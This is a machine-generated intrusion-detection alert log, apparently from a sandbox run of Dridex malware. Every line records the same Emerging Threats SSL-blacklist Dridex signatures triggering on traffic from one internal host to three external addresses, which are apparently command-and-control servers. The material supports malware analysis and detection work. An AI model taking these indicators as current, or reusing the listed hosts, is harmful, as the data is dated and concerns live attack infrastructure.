                                                                                                                                      01/12/21-01:44:13.712604TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:14.238930TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:14.238930TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491935.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:15.545794TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:16.092017TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084919680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:16.606197TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:16.606197TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491975.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:18.668025TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:19.192309TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:19.719108TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:19.719108TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492015.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:20.782259TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:21.313052TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:21.845259TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:21.845259TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492055.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:22.895057TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434920777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:23.405578TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084920880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:23.953654TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:23.953654TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:25.002498TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:25.530736TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:26.056875TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:26.056875TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:27.108377TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:27.632953TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:28.141501TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:28.141501TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:29.176541TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:29.707201TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:30.215452TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:30.215452TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:31.256057TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:31.788343TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922580.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:32.313060TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492265.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:32.313060TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492265.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:33.550778TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434922977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:34.681061TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:35.362624TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:35.362624TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492315.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:36.422943TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:36.946269TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:37.479110TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:37.479110TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492355.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:38.558764TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434923777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:39.085287TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084923880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:39.621599TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:39.621599TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492395.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:40.655749TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:41.192565TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:41.709332TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:41.709332TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492435.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:42.762681TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:43.286682TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084924680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:43.812850TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:43.812850TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492475.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:44.949043TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434924977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:45.502620TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:46.036344TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:46.036344TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492515.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:47.099344TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:47.623986TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:48.146230TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:48.146230TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492555.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:49.200660TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434925777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:49.730973TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084925880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:50.258776TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:50.258776TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492595.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:51.536021TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:52.459368TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:53.023442TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:53.023442TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492635.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:54.069024TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:54.586272TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:55.105278TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:55.105278TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492675.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:56.163308TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:56.687833TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:57.231482TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:57.231482TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492715.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:58.286957TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:58.809666TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:59.327613TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:59.327613TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492755.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:00.440152TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:00.957031TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:01.454270TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:01.454270TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492795.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:02.480574TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:03.007372TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:03.525800TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:03.525800TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492835.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:04.587567TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:05.128540TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:05.666075TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492875.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:05.666075TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492875.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:06.703485TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:07.238284TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:07.771134TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492915.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:07.771134TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492915.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:08.957115TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:09.805911TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:10.330021TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492955.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:10.330021TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492955.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:11.386788TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:11.911558TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:12.436507TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492995.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:12.436507TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492995.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:13.495340TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:14.021716TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:14.555571TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493035.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:14.555571TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493035.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:15.603847TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:16.126558TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:16.640695TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493075.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:16.640695TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493075.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:17.696660TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:18.229357TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:18.751789TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493115.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:18.751789TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493115.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:19.800482TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:20.328687TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:20.857658TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493155.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:20.857658TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493155.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:21.920306TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:22.439244TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:22.971524TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493195.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:22.971524TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493195.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:24.042558TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:24.628506TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:25.172507TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493235.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:25.172507TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493235.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:26.353761TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:27.111738TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:27.730963TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493275.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:27.730963TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493275.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:28.783770TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:29.304929TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:29.833595TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493315.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:29.833595TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493315.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:30.906865TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:31.434784TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:31.954050TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493355.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:31.954050TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493355.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:33.014613TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:33.538117TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:34.066648TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493395.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:34.066648TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493395.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:35.135796TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:35.659720TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:36.196982TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493435.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:36.196982TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493435.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:37.273354TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:37.800934TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:38.336189TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493475.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:38.336189TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493475.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:39.394809TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:39.922134TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:40.450447TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493515.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:40.450447TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493515.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:41.501973TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:42.028269TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:42.553434TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493555.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:42.553434TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493555.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:43.740382TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:45:44.654204TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:45:45.189935TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493595.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:45.189935TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493595.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:45.406566TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493605.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:45.406566TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493605.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:45:46.466078TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936277.220.64.37192.168.2.22
